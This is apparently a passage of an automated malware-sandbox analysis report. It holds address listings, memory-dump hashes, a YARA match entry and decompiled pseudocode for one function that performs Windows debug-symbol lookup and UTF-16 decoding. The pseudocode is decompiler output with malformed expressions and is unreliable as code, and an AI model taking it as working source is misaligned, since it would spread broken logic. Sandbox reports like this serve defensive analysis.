                          0x001df5e0
                          0x001df5eb
                          0x001df5f6
                          0x001df601
                          0x001df609
                          0x001df611
                          0x001df619
                          0x001df621
                          0x001df62c
                          0x001df634
                          0x001df63f
                          0x001df64a
                          0x001df655
                          0x001df660
                          0x001df66b
                          0x001df676
                          0x001df67e
                          0x001df686
                          0x001df691
                          0x001df69c
                          0x001df6a4
                          0x001df6af
                          0x001df6ba
                          0x001df6c5
                          0x001df6d0
                          0x001df6db
                          0x001df6e6
                          0x001df6f1
                          0x001df705
                          0x001df70a
                          0x001df713
                          0x001df71e
                          0x001df729
                          0x001df734
                          0x001df73f
                          0x001df74a
                          0x001df756
                          0x001df75b
                          0x001df765
                          0x001df768
                          0x001df76c
                          0x001df771
                          0x001df779
                          0x001df784
                          0x001df78c
                          0x001df797
                          0x001df79f
                          0x001df7a7
                          0x001df7af
                          0x001df7b7
                          0x001df7bf
                          0x001df7ca
                          0x001df7d7
                          0x001df7df
                          0x001df7ea
                          0x001df7fe
                          0x001df803
                          0x001df80c
                          0x001df814
                          0x001df81c
                          0x001df827
                          0x001df832
                          0x001df844
                          0x001df849
                          0x001df852
                          0x001df85d
                          0x001df868
                          0x001df873
                          0x001df87e
                          0x001df889
                          0x001df894
                          0x001df89f
                          0x001df8aa
                          0x001df8b5
                          0x001df8bd
                          0x001df8c8
                          0x001df8da
                          0x001df8df
                          0x001df8e8
                          0x001df8f3
                          0x001df8fe
                          0x001df906
                          0x001df911
                          0x001df919
                          0x001df921
                          0x001df925
                          0x001df92d
                          0x001df93f
                          0x001df944
                          0x001df94d
                          0x001df958
                          0x001df963
                          0x001df96e
                          0x001df97b
                          0x001df97c
                          0x001df980
                          0x001df988
                          0x001df990
                          0x001df998
                          0x001df9a0
                          0x001df9ad
                          0x001df9b1
                          0x001df9b9
                          0x001df9c1
                          0x001df9c9
                          0x001df9d7
                          0x001df9db
                          0x001df9e3
                          0x001df9eb
                          0x001df9f3
                          0x001df9fb
                          0x001dfa05
                          0x001dfa0a
                          0x001dfa0f
                          0x001dfa17
                          0x001dfa22
                          0x001dfa2a
                          0x001dfa35
                          0x001dfa3d
                          0x001dfa4b
                          0x001dfa50
                          0x001dfa54
                          0x001dfa5c
                          0x001dfa64
                          0x001dfa6c
                          0x001dfa74
                          0x001dfa80
                          0x001dfa81
                          0x001dfa83
                          0x001dfa87
                          0x001dfa8f
                          0x001dfaa2
                          0x001dfaa9
                          0x001dfab4
                          0x001dfabf
                          0x001dfaca
                          0x001dfad5
                          0x001dfae0
                          0x001dfae8
                          0x001dfaf3
                          0x001dfafe
                          0x001dfb06
                          0x001dfb11
                          0x001dfb27
                          0x001dfb39
                          0x001dfb40
                          0x001dfb4b
                          0x001dfb53
                          0x001dfb5b
                          0x001dfb67
                          0x001dfb6a
                          0x001dfb6e
                          0x001dfb76
                          0x001dfb81
                          0x001dfb8c
                          0x001dfb97
                          0x001dfba2
                          0x001dfbaa
                          0x001dfbb5
                          0x001dfbc0
                          0x001dfbd3
                          0x001dfbda
                          0x001dfbe2
                          0x001dfbed
                          0x001dfbf8
                          0x001dfbf8
                          0x001dfbf8
                          0x001dfbfd
                          0x001dfc02
                          0x001dfc07
                          0x001dfc07
                          0x001dfc07
                          0x001dfc07
                          0x001dfc0d
                          0x00000000
                          0x00000000
                          0x001dfc13
                          0x001dff3e
                          0x00000000
                          0x001dfc19
                          0x001dfc1b
                          0x001dfde7
                          0x001dfdf3
                          0x001dfdfb
                          0x001dfe00
                          0x001dfe0c
                          0x001dfe0e
                          0x001dfe19
                          0x001dfe3d
                          0x001dfe44
                          0x001dfe4b
                          0x001dfe5a
                          0x001dfe62
                          0x001dfe77
                          0x001dfe7e
                          0x001dfe98
                          0x001dfea6
                          0x001dfeea
                          0x001dfefa
                          0x001dff0c
                          0x001dff2c
                          0x001dff31
                          0x001dff34
                          0x001dff34
                          0x00000000
                          0x001dfc21
                          0x001dfc23
                          0x001dfd3b
                          0x001dfd47
                          0x001dfd55
                          0x001dfd5b
                          0x001dfdbb
                          0x001dfdc9
                          0x001dfdda
                          0x001dfddf
                          0x00000000
                          0x001dfc29
                          0x001dfc2f
                          0x001dfc5b
                          0x001dfc67
                          0x001dfc72
                          0x001dfc78
                          0x001dfc79
                          0x001dfc82
                          0x001dfc90
                          0x001dfca5
                          0x001dfcf9
                          0x001dfcfe
                          0x001dfd01
                          0x001dfd05
                          0x001dfd0e
                          0x001dfd07
                          0x001dfd09
                          0x001dfd0b
                          0x001dfd0b
                          0x001dfd2e
                          0x001dfd33
                          0x001e00a1
                          0x001e00a1
                          0x001e00a6
                          0x001e00ab
                          0x00000000
                          0x001dfc31
                          0x001dfc37
                          0x00000000
                          0x001dfc3d
                          0x001dfc51
                          0x001dfc57
                          0x001dfbf8
                          0x001dfbf8
                          0x001dfbf8
                          0x001dfbfd
                          0x001dfc02
                          0x00000000
                          0x001dfc02
                          0x001dfbf8
                          0x001dfc37
                          0x001dfc2f
                          0x001dfc23
                          0x001dfc1b
                          0x001dff8d
                          0x001dff97
                          0x001dff97
                          0x001dff48
                          0x001dff4a
                          0x001e007a
                          0x001e007b
                          0x001e0084
                          0x001e0086
                          0x001e008e
                          0x001e0091
                          0x001e0093
                          0x001e009f
                          0x00000000
                          0x001e0095
                          0x001e0095
                          0x00000000
                          0x001e0095
                          0x001dff50
                          0x001dff50
                          0x001dff56
                          0x001dff98
                          0x001dffa1
                          0x001dffa9
                          0x001dffae
                          0x001dffb9
                          0x001dffc1
                          0x001dffdf
                          0x001e000a
                          0x001e0018
                          0x001e0029
                          0x001e004c
                          0x001e0051
                          0x00000000
                          0x001dff58
                          0x001dff58
                          0x001dff5a
                          0x00000000
                          0x001dff60
                          0x001dff60
                          0x001dff83
                          0x001dff88
                          0x001dff5a
                          0x001dff56
                          0x00000000
                          0x001e00b0
                          0x001e00b0
                          0x001e00b0
                          0x00000000
                          0x001e00bc

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: >:$1$4dm$4dm$:=_$EN5$N9$N]$Nm.$_:$d"F$nM=$o/$p[$rVs$tA$wP$x0e$6(j$y
                          • API String ID: 0-3648772094
                          • Opcode ID: 26df7e8b4dd5bc62706ca0ff30a2427d6e14c3fb4fe789929bab138871570dfb
                          • Instruction ID: 3f73b1f04cf29cf7cbfb70bfa2138175227ff3e7eb281c64cb37c6086557d61e
                          • Opcode Fuzzy Hash: 26df7e8b4dd5bc62706ca0ff30a2427d6e14c3fb4fe789929bab138871570dfb
                          • Instruction Fuzzy Hash: F692F0715097808FD3B9CF65C98AB8FBBE1BBD5748F10891DE1CA86260D7B18949CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4AE890, Relevance: 25.1, APIs: 9, Strings: 5, Instructions: 588libraryloaderCOMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 52%
                          			E6E4AE890(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi) {
				void* _v16;
				char _v4528;
				void* __ebp;
				char* _t225;
				void* _t234;
				void* _t237;
				signed int _t240;
				signed int _t243;
				signed char _t249;
				intOrPtr _t250;
				void* _t255;
				intOrPtr _t256;
				signed int _t258;
				signed char _t262;
				signed int _t265;
				signed short _t267;
				signed short* _t269;
				signed int _t273;
				void* _t277;
				void* _t278;
				intOrPtr _t279;
				signed int _t281;
				void* _t283;
				intOrPtr _t284;
				signed int _t286;
				signed short _t290;
				signed int _t292;
				signed short* _t293;
				signed short _t294;
				signed int _t297;
				signed int _t298;
				signed int _t301;
				signed int _t302;
				signed int _t304;
				signed int _t309;
				signed int _t310;
				signed int _t312;
				signed short* _t317;
				intOrPtr _t321;
				intOrPtr _t322;
				void* _t328;
				signed int _t330;
				intOrPtr _t333;
				signed int _t337;
				void* _t338;
				void* _t346;
				intOrPtr _t350;
				signed short* _t353;
				signed int _t354;
				signed int _t357;
				void* _t358;
				signed int _t365;
				void* _t366;
				signed short* _t369;
				signed int _t371;
				signed int _t373;
				signed short* _t379;
				signed int _t381;
				signed char _t384;
				signed char _t385;
				intOrPtr _t392;
				signed int* _t393;
				signed char _t394;
				signed int _t397;
				signed char _t398;
				signed int _t399;
				signed int _t400;
				signed short _t401;
				signed int _t407;
				signed int _t409;
				signed char _t410;
				signed int _t411;
				signed short _t412;
				signed int _t418;
				intOrPtr _t421;
				signed int _t423;
				signed int _t424;

				_t365 = __edx;
				_t321 = __ecx;
				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t424 = _t423 & 0xfffffff0;
				E6E4BA000(0x11b0);
				_t418 = _t424;
				 *((intOrPtr*)(_t418 + 0x1198)) = _t421;
				 *(_t418 + 0x119c) = _t424;
				 *(_t418 + 0x11a8) = 0xffffffff;
				 *((intOrPtr*)(_t418 + 0x11a4)) = E6E4B3BB0;
				 *((intOrPtr*)(_t418 + 0x11a0)) =  *[fs:0x0];
				 *[fs:0x0] = _t418 + 0x11a0;
				 *((intOrPtr*)(_t418 + 0x5c)) = __edx;
				_t225 =  *((intOrPtr*)(__ecx));
				if( *_t225 != 0 ||  *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)))) <= 0x64) {
					_t392 =  *((intOrPtr*)(_t321 + 8));
					_t301 =  *(_t321 + 0xc);
					 *((intOrPtr*)(_t418 + 0x80)) = _t321;
					_t322 =  *((intOrPtr*)(_t321 + 0x10));
					 *(_t418 + 0x1c) = _t365;
					_t366 = _t418 + 0x12;
					 *(_t418 + 0x12) = 0;
					 *((char*)(_t418 + 0x13)) = 0;
					 *(_t418 + 0x84) = _t366;
					 *((intOrPtr*)(_t418 + 0x88)) = _t225;
					 *((intOrPtr*)(_t418 + 0x8c)) = _t392;
					 *((intOrPtr*)(_t418 + 0x90)) = _t418 + 0x13;
					 *(_t418 + 0x94) = _t301;
					 *((intOrPtr*)(_t418 + 0x98)) = _t322;
					 *((intOrPtr*)(_t418 + 0x7c)) = _t392;
					 *(_t418 + 0x58) = _t301;
					 *((intOrPtr*)(_t418 + 0x78)) = _t322;
					 *((intOrPtr*)(_t418 + 0x9c)) = _t418 + 0x5c;
					if(E6E4AE690(_t301, _t392, _t418) == 0) {
						_t393 =  *(_t418 + 0x1c);
						 *(_t418 + 0x2c) = _t366;
						__eflags =  *_t393 ^ 0x00000001 | _t393[1];
						if(( *_t393 ^ 0x00000001 | _t393[1]) != 0) {
							E6E4BC310(_t393, _t418 + 0x1a4, 0, 0xff4);
							_t424 = _t424 + 0xc;
							_t302 =  *0x6e4fadfc; // 0x0
							 *((intOrPtr*)(_t418 + 0x1f0)) = 0x7d0;
							 *((intOrPtr*)(_t418 + 0x1a0)) = 0x58;
							__eflags = _t302;
							if(_t302 != 0) {
								L33:
								_t234 = GetCurrentProcess();
								_t394 = _t393[0x45];
								 *(_t418 + 0x18) = _t234;
								 *(_t418 + 0xa4) = 0;
								 *(_t418 + 0xa0) = 0;
								_t369 =  <  ? 0 : _t393[2] - 1;
								 *(_t418 + 0x20) = _t394;
								 *(_t418 + 0x30) = _t369;
								_t237 =  *_t302( *(_t418 + 0x18), _t369, 0, _t394, _t418 + 0xa0, _t418 + 0x1a0);
								__eflags = _t237 - 1;
								if(_t237 != 1) {
									goto L75;
								} else {
									_t250 =  *((intOrPtr*)(_t418 + 0x1ec));
									asm("xorps xmm0, xmm0");
									_t304 = _t418 + 0x1f4;
									_t371 = _t418 + 0xa0;
									 *(_t418 + 0xc) = 0;
									asm("movaps [esi+0x190], xmm0");
									asm("movaps [esi+0x180], xmm0");
									asm("movaps [esi+0x170], xmm0");
									asm("movaps [esi+0x160], xmm0");
									asm("movaps [esi+0x150], xmm0");
									asm("movaps [esi+0x140], xmm0");
									asm("movaps [esi+0x130], xmm0");
									asm("movaps [esi+0x120], xmm0");
									asm("movaps [esi+0x110], xmm0");
									asm("movaps [esi+0x100], xmm0");
									asm("movaps [esi+0xf0], xmm0");
									asm("movaps [esi+0xe0], xmm0");
									asm("movaps [esi+0xd0], xmm0");
									asm("movaps [esi+0xc0], xmm0");
									asm("movaps [esi+0xb0], xmm0");
									asm("movaps [esi+0xa0], xmm0");
									_t328 =  *((intOrPtr*)(_t418 + 0x1f0)) - 1;
									__eflags = _t250 - _t328;
									_t329 =  <=  ? _t250 : _t328;
									_t330 = 0;
									 *(_t418 + 0x14) = _t418 + 0x1f4 + ( <=  ? _t250 : _t328) * 2;
									__eflags = 0;
									 *(_t418 + 0x18) = 0x100;
									if(0 == 0) {
										L37:
										__eflags = _t304 -  *(_t418 + 0x14);
										if(_t304 !=  *(_t418 + 0x14)) {
											_t400 = _t304;
											_t304 = _t304 + 2;
											__eflags = _t304;
											_t401 =  *_t400 & 0x0000ffff;
											goto L39;
										}
									} else {
										asm("o16 nop [cs:eax+eax]");
										L36:
										_t401 = _t330 >> 0x10;
										L39:
										 *(_t418 + 0x1c) = _t330 & 0xffff0000;
										__eflags = (_t401 & 0x0000f800) - 0xd800;
										if((_t401 & 0x0000f800) != 0xd800) {
											 *(_t418 + 0x24) = _t304;
											_t337 = _t401 & 0x0000ffff;
											_t262 = 0;
										} else {
											_t269 = _t304;
											_t337 = 0;
											__eflags = (_t401 & 0x0000ffff) - 0xdbff;
											if((_t401 & 0x0000ffff) <= 0xdbff) {
												_t309 =  *(_t418 + 0x14);
												__eflags = _t269 - _t309;
												if(_t269 == _t309) {
													 *(_t418 + 0x24) = _t309;
													goto L48;
												} else {
													_t310 =  *_t269 & 0x0000ffff;
													 *(_t418 + 0x24) =  &(_t269[1]);
													 *(_t418 + 0x28) = _t310;
													__eflags = (_t310 & 0x0000fc00) - 0xdc00;
													if((_t310 & 0x0000fc00) != 0xdc00) {
														 *(_t418 + 0x1c) = ( *(_t418 + 0x28) & 0x0000ffff) << 0x00000010 | 0x00000001;
														asm("o16 nop [eax+eax]");
														goto L48;
													} else {
														_t262 = 0;
														_t337 = ( *(_t418 + 0x28) + 0x00002400 & 0x0000ffff | (_t401 + 0x00002800 & 0x0000ffff) << 0x0000000a) + 0x10000;
													}
												}
											} else {
												 *(_t418 + 0x24) = _t269;
												L48:
												_t262 = 1;
											}
										}
										_t304 =  *(_t418 + 0x18);
										__eflags = _t262 & 0x00000001;
										_t394 = 1;
										_t338 =  !=  ? 0xfffd : _t337;
										__eflags = _t338 - 0x80;
										if(_t338 >= 0x80) {
											_t394 = 2;
											__eflags = _t338 - 0x800;
											if(_t338 >= 0x800) {
												__eflags = _t338 - 0x10000;
												_t394 = 4;
												asm("sbb edi, 0x0");
											}
										}
										_t265 = _t304 - _t394;
										__eflags = _t265;
										 *(_t418 + 0x28) = _t265;
										if(_t265 > 0) {
											 *(_t418 + 0x34) = _t394;
											 *(_t418 + 0x11a8) = 0;
											 *(_t418 + 0x18) = _t371;
											E6E4ADD00(_t304, _t338, _t371, _t394, _t418, _t421, _t304);
											_t424 = _t424 + 4;
											_t267 =  *(_t418 + 0x34);
											_t330 =  *(_t418 + 0x1c);
											_t304 =  *(_t418 + 0x24);
											_t371 =  *(_t418 + 0x18) + _t267;
											 *(_t418 + 0xc) =  *(_t418 + 0xc) + _t267;
											__eflags = _t330;
											 *(_t418 + 0x18) =  *(_t418 + 0x28);
											if(_t330 != 0) {
												goto L36;
											} else {
												goto L37;
											}
										}
									}
									__eflags =  *(_t418 + 0xc) - 0x101;
									if(__eflags >= 0) {
										 *(_t418 + 0x11a8) = 0;
										E6E4C6DB0(_t304,  *(_t418 + 0xc), 0x100, _t394, _t418, __eflags, 0x6e4ee1dc);
										goto L87;
									} else {
										_t397 =  *0x6e4fae00; // 0x0
										asm("xorps xmm0, xmm0");
										 *(_t418 + 0x74) = 0;
										 *(_t418 + 0x70) = 0;
										asm("movaps [esi+0x60], xmm0");
										 *((intOrPtr*)(_t418 + 0x60)) = 0x18;
										__eflags = _t397;
										if(_t397 != 0) {
											L67:
											_t255 = GetCurrentProcess();
											_t333 = _t418 + 0x60;
											 *(_t418 + 0x38) = 0;
											_t373 = _t418 + 0x38;
											_t256 =  *_t397(_t255,  *(_t418 + 0x30), 0,  *(_t418 + 0x20), 0, 0, _t373, _t333);
											__eflags = _t256 - 1;
											if(_t256 != 1) {
												_t398 = 0;
												__eflags = 0;
											} else {
												_t256 =  *((intOrPtr*)(_t418 + 0x68));
												_t333 =  *((intOrPtr*)(_t418 + 0x6c));
												_t399 = 0;
												__eflags = 0;
												asm("o16 nop [cs:eax+eax]");
												do {
													_t373 = _t399;
													_t399 = _t399 + 1;
													__eflags =  *((short*)(_t333 + _t373 * 2));
												} while ( *((short*)(_t333 + _t373 * 2)) != 0);
												 *(_t418 + 0x11a8) = 0;
												_t398 = 1;
											}
											 *(_t418 + 0x11a8) = 0;
											 *(_t418 + 0x38) = _t418 + 0xa0;
											 *(_t418 + 0x3c) =  *(_t418 + 0xc);
											 *((intOrPtr*)(_t418 + 0x40)) =  *((intOrPtr*)(_t418 + 0x1d8));
											 *(_t418 + 0x44) = _t398;
											 *((intOrPtr*)(_t418 + 0x48)) = _t256;
											 *(_t418 + 0x4c) = _t398;
											 *((intOrPtr*)(_t418 + 0x50)) = _t333;
											 *(_t418 + 0x54) = _t373;
											E6E4AFA10(_t418 + 0x84, _t418 + 0x38);
											goto L75;
										} else {
											_t258 = GetProcAddress( *0x6e4fadd0, "SymGetLineFromInlineContextW");
											__eflags = _t258;
											if(__eflags == 0) {
												 *(_t418 + 0x11a8) = 0;
												E6E4C6E20(_t304, "called `Option::unwrap()` on a `None` value", 0x2b, _t397, _t418, __eflags, 0x6e4ee2c0);
												goto L87;
											} else {
												_t397 = _t258;
												 *0x6e4fae00 = _t258;
												goto L67;
											}
										}
									}
								}
							} else {
								_t273 = GetProcAddress( *0x6e4fadd0, "SymFromInlineContextW");
								__eflags = _t273;
								if(__eflags == 0) {
									 *(_t418 + 0x11a8) = 0;
									E6E4C6E20(_t302, "called `Option::unwrap()` on a `None` value", 0x2b, _t393, _t418, __eflags, 0x6e4ee2c0);
									goto L87;
								} else {
									_t302 = _t273;
									 *0x6e4fadfc = _t273;
									goto L33;
								}
							}
						} else {
							_t312 = _t393[2];
							E6E4BC310(_t393, _t418 + 0x1a4, 0, 0xff4);
							_t424 = _t424 + 0xc;
							_t407 =  *0x6e4fadf0; // 0x0
							 *((intOrPtr*)(_t418 + 0x1f0)) = 0x7d0;
							 *((intOrPtr*)(_t418 + 0x1a0)) = 0x58;
							__eflags = _t407;
							if(_t407 != 0) {
								L9:
								_t277 = GetCurrentProcess();
								 *(_t418 + 0xa4) = 0;
								 *(_t418 + 0xa0) = 0;
								_t278 =  *_t407(_t277, _t312, 0, _t418 + 0xa0, _t418 + 0x1a0);
								__eflags = _t278 - 1;
								if(_t278 != 1) {
									L75:
									ReleaseMutex( *(_t418 + 0x2c));
									__eflags =  *((char*)(_t418 + 0x13));
									if( *((char*)(_t418 + 0x13)) != 0) {
										goto L4;
									} else {
										goto L76;
									}
									goto L80;
								} else {
									_t279 =  *((intOrPtr*)(_t418 + 0x1ec));
									asm("xorps xmm0, xmm0");
									_t408 = 0x100;
									 *(_t418 + 0x20) = 0;
									 *(_t418 + 0x14) = _t312;
									asm("movaps [esi+0x190], xmm0");
									asm("movaps [esi+0x180], xmm0");
									asm("movaps [esi+0x170], xmm0");
									asm("movaps [esi+0x160], xmm0");
									asm("movaps [esi+0x150], xmm0");
									asm("movaps [esi+0x140], xmm0");
									asm("movaps [esi+0x130], xmm0");
									asm("movaps [esi+0x120], xmm0");
									asm("movaps [esi+0x110], xmm0");
									asm("movaps [esi+0x100], xmm0");
									asm("movaps [esi+0xf0], xmm0");
									asm("movaps [esi+0xe0], xmm0");
									asm("movaps [esi+0xd0], xmm0");
									asm("movaps [esi+0xc0], xmm0");
									asm("movaps [esi+0xb0], xmm0");
									asm("movaps [esi+0xa0], xmm0");
									_t346 =  *((intOrPtr*)(_t418 + 0x1f0)) - 1;
									__eflags = _t279 - _t346;
									_t347 =  <=  ? _t279 : _t346;
									_t379 = _t418 + 0x1f4 + ( <=  ? _t279 : _t346) * 2;
									 *(_t418 + 0xc) = _t418 + 0x1f4;
									_t281 = 0;
									 *(_t418 + 0x30) = _t379;
									__eflags = 0;
									 *(_t418 + 0x1c) = _t418 + 0xa0;
									 *(_t418 + 0x28) = 0x100;
									if(0 == 0) {
										L13:
										__eflags =  *(_t418 + 0xc) - _t379;
										if( *(_t418 + 0xc) != _t379) {
											_t353 =  *(_t418 + 0xc);
											_t412 =  *_t353 & 0x0000ffff;
											_t354 =  &(_t353[1]);
											__eflags = _t354;
											 *(_t418 + 0xc) = _t354;
											goto L15;
										}
									} else {
										L12:
										_t412 = _t281 >> 0x10;
										L15:
										 *(_t418 + 0x18) = _t281 & 0xffff0000;
										__eflags = (_t412 & 0x0000f800) - 0xd800;
										if((_t412 & 0x0000f800) != 0xd800) {
											_t357 = _t412 & 0x0000ffff;
											_t384 = 0;
										} else {
											_t357 = 0;
											_t384 = 1;
											__eflags = (_t412 & 0x0000ffff) - 0xdbff;
											if((_t412 & 0x0000ffff) <= 0xdbff) {
												_t317 =  *(_t418 + 0xc);
												_t293 =  *(_t418 + 0x30);
												__eflags = _t317 - _t293;
												if(_t317 == _t293) {
													 *(_t418 + 0xc) = _t293;
												} else {
													_t294 =  *_t317 & 0x0000ffff;
													 *(_t418 + 0xc) =  &(_t317[1]);
													__eflags = (_t294 & 0x0000fc00) - 0xdc00;
													if((_t294 & 0x0000fc00) != 0xdc00) {
														_t297 = (_t294 & 0x0000ffff) << 0x00000010 | 0x00000001;
														__eflags = _t297;
														 *(_t418 + 0x18) = _t297;
													} else {
														_t384 = 0;
														_t357 = (_t294 + 0x00002400 & 0x0000ffff | (_t412 + 0x00002800 & 0x0000ffff) << 0x0000000a) + 0x10000;
													}
												}
											}
											_t312 =  *(_t418 + 0x14);
										}
										__eflags = _t384 & 0x00000001;
										_t385 = 1;
										_t358 =  !=  ? 0xfffd : _t357;
										_t290 =  *(_t418 + 0x28);
										__eflags = _t358 - 0x80;
										if(_t358 >= 0x80) {
											_t385 = 2;
											__eflags = _t358 - 0x800;
											if(_t358 >= 0x800) {
												__eflags = _t358 - 0x10000;
												_t385 = 4;
												asm("sbb edx, 0x0");
											}
										}
										_t408 = _t290 - _t385;
										__eflags = _t408;
										if(_t408 > 0) {
											 *(_t418 + 0x24) = _t385;
											 *(_t418 + 0x34) = _t408;
											 *(_t418 + 0x11a8) = 0;
											E6E4ADD00(_t312, _t358,  *(_t418 + 0x1c), _t408, _t418, _t421, _t290);
											_t424 = _t424 + 4;
											_t292 =  *(_t418 + 0x24);
											_t408 =  *(_t418 + 0x34);
											_t312 =  *(_t418 + 0x14);
											_t379 =  *(_t418 + 0x30);
											 *(_t418 + 0x20) =  *(_t418 + 0x20) + _t292;
											_t281 =  *(_t418 + 0x18);
											__eflags = _t281;
											 *(_t418 + 0x1c) =  *(_t418 + 0x1c) + _t292;
											 *(_t418 + 0x28) =  *(_t418 + 0x34);
											if(_t281 != 0) {
												goto L12;
											} else {
												goto L13;
											}
										}
									}
									__eflags =  *(_t418 + 0x20) - 0x101;
									if(__eflags >= 0) {
										 *(_t418 + 0x11a8) = 0;
										E6E4C6DB0(_t312,  *(_t418 + 0x20), 0x100, _t408, _t418, __eflags, 0x6e4ee1dc);
										goto L87;
									} else {
										_t409 =  *0x6e4fadf4; // 0x0
										asm("xorps xmm0, xmm0");
										 *(_t418 + 0x74) = 0;
										 *(_t418 + 0x70) = 0;
										asm("movaps [esi+0x60], xmm0");
										 *((intOrPtr*)(_t418 + 0x60)) = 0x18;
										__eflags = _t409;
										if(_t409 != 0) {
											L59:
											_t283 = GetCurrentProcess();
											_t350 = _t418 + 0x60;
											 *(_t418 + 0x38) = 0;
											_t381 = _t418 + 0x38;
											_t284 =  *_t409(_t283, _t312, 0, _t381, _t350);
											__eflags = _t284 - 1;
											if(_t284 != 1) {
												_t410 = 0;
												__eflags = 0;
											} else {
												_t284 =  *((intOrPtr*)(_t418 + 0x68));
												_t350 =  *((intOrPtr*)(_t418 + 0x6c));
												_t411 = 0;
												__eflags = 0;
												asm("o16 nop [cs:eax+eax]");
												do {
													_t381 = _t411;
													_t411 = _t411 + 1;
													__eflags =  *((short*)(_t350 + _t381 * 2));
												} while ( *((short*)(_t350 + _t381 * 2)) != 0);
												 *(_t418 + 0x11a8) = 0;
												_t410 = 1;
											}
											 *(_t418 + 0x11a8) = 0;
											 *(_t418 + 0x38) = _t418 + 0xa0;
											 *(_t418 + 0x3c) =  *(_t418 + 0x20);
											 *((intOrPtr*)(_t418 + 0x40)) =  *((intOrPtr*)(_t418 + 0x1d8));
											 *(_t418 + 0x44) = _t410;
											 *((intOrPtr*)(_t418 + 0x48)) = _t284;
											 *(_t418 + 0x4c) = _t410;
											 *((intOrPtr*)(_t418 + 0x50)) = _t350;
											 *(_t418 + 0x54) = _t381;
											E6E4AFA10(_t418 + 0x84, _t418 + 0x38);
											goto L75;
										} else {
											_t286 = GetProcAddress( *0x6e4fadd0, "SymGetLineFromAddrW64");
											__eflags = _t286;
											if(__eflags == 0) {
												 *(_t418 + 0x11a8) = 0;
												E6E4C6E20(_t312, "called `Option::unwrap()` on a `None` value", 0x2b, _t409, _t418, __eflags, 0x6e4ee2c0);
												goto L87;
											} else {
												_t409 = _t286;
												 *0x6e4fadf4 = _t286;
												goto L59;
											}
										}
									}
								}
							} else {
								_t298 = GetProcAddress( *0x6e4fadd0, "SymFromAddrW");
								__eflags = _t298;
								if(__eflags == 0) {
									 *(_t418 + 0x11a8) = 0;
									E6E4C6E20(_t312, "called `Option::unwrap()` on a `None` value", 0x2b, _t407, _t418, __eflags, 0x6e4ee2c0);
									L87:
									asm("ud2");
									asm("o16 nop [eax+eax]");
									_push(_t421);
									return E6E4AE880( *((intOrPtr*)( &_v4528 + 0x2c)));
								} else {
									_t407 = _t298;
									 *0x6e4fadf0 = _t298;
									goto L9;
								}
							}
						}
					} else {
						if( *((char*)(_t418 + 0x13)) == 0) {
							L76:
							__eflags =  *(_t418 + 0x12);
							if( *(_t418 + 0x12) == 0) {
								__eflags =  *((char*)( *((intOrPtr*)(_t418 + 0x7c))));
								if( *((char*)( *((intOrPtr*)(_t418 + 0x7c)))) != 0) {
									 *(_t418 + 0x38) =  *((intOrPtr*)(_t418 + 0x78));
									 *(_t418 + 0x3c) = 0;
									 *(_t418 + 0x1a8) = 4;
									 *(_t418 + 0xa0) = 2;
									 *(_t418 + 0x11a8) = 1;
									_push(0);
									_push(_t418 + 0xa0);
									_push(_t418 + 0x1a0);
									 *( *(_t418 + 0x58)) = E6E4AF250(_t418 + 0x38,  *((intOrPtr*)( *((intOrPtr*)(_t418 + 0x5c)) + 8)));
									_t249 =  *(_t418 + 0x38);
									_t202 = _t249 + 4;
									 *_t202 =  *(_t249 + 4) + 1;
									__eflags =  *_t202;
								}
							}
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t418 + 0x80)) + 4)))) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t418 + 0x80)) + 4)))) + 1;
							_t243 =  *(_t418 + 0x58);
							__eflags =  *_t243;
							_t208 =  *_t243 == 0;
							__eflags = _t208;
							_t240 = _t243 & 0xffffff00 | _t208;
						} else {
							goto L4;
						}
						goto L80;
					}
				} else {
					L4:
					_t240 = 0;
					L80:
					 *[fs:0x0] =  *((intOrPtr*)(_t418 + 0x11a0));
					return _t240;
				}
			}
















































































                          0x6e4ae890
                          0x6e4ae890
                          0x6e4ae893
                          0x6e4ae894
                          0x6e4ae895
                          0x6e4ae896
                          0x6e4ae89e
                          0x6e4ae8a3
                          0x6e4ae8a5
                          0x6e4ae8ab
                          0x6e4ae8b1
                          0x6e4ae8bb
                          0x6e4ae8d2
                          0x6e4ae8d8
                          0x6e4ae8de
                          0x6e4ae8e1
                          0x6e4ae8e6
                          0x6e4ae8f0
                          0x6e4ae8f3
                          0x6e4ae8f6
                          0x6e4ae8fc
                          0x6e4ae8ff
                          0x6e4ae902
                          0x6e4ae905
                          0x6e4ae909
                          0x6e4ae90d
                          0x6e4ae913
                          0x6e4ae91c
                          0x6e4ae922
                          0x6e4ae92b
                          0x6e4ae931
                          0x6e4ae937
                          0x6e4ae93a
                          0x6e4ae93d
                          0x6e4ae940
                          0x6e4ae94d
                          0x6e4ae960
                          0x6e4ae963
                          0x6e4ae96b
                          0x6e4ae96e
                          0x6e4aec18
                          0x6e4aec1d
                          0x6e4aec20
                          0x6e4aec26
                          0x6e4aec30
                          0x6e4aec3a
                          0x6e4aec3c
                          0x6e4aec5e
                          0x6e4aec5e
                          0x6e4aec66
                          0x6e4aec6c
                          0x6e4aec77
                          0x6e4aec81
                          0x6e4aec8e
                          0x6e4aec99
                          0x6e4aec9f
                          0x6e4aeca6
                          0x6e4aeca8
                          0x6e4aecab
                          0x00000000
                          0x6e4aecb1
                          0x6e4aecb7
                          0x6e4aecbd
                          0x6e4aecc0
                          0x6e4aecc6
                          0x6e4aeccc
                          0x6e4aecd3
                          0x6e4aecda
                          0x6e4aece1
                          0x6e4aece8
                          0x6e4aecef
                          0x6e4aecf6
                          0x6e4aecfd
                          0x6e4aed04
                          0x6e4aed0b
                          0x6e4aed12
                          0x6e4aed19
                          0x6e4aed20
                          0x6e4aed27
                          0x6e4aed2e
                          0x6e4aed35
                          0x6e4aed3c
                          0x6e4aed43
                          0x6e4aed44
                          0x6e4aed46
                          0x6e4aed50
                          0x6e4aed52
                          0x6e4aed5a
                          0x6e4aed5d
                          0x6e4aed60
                          0x6e4aed80
                          0x6e4aed80
                          0x6e4aed83
                          0x6e4aed89
                          0x6e4aed8b
                          0x6e4aed8b
                          0x6e4aed8e
                          0x00000000
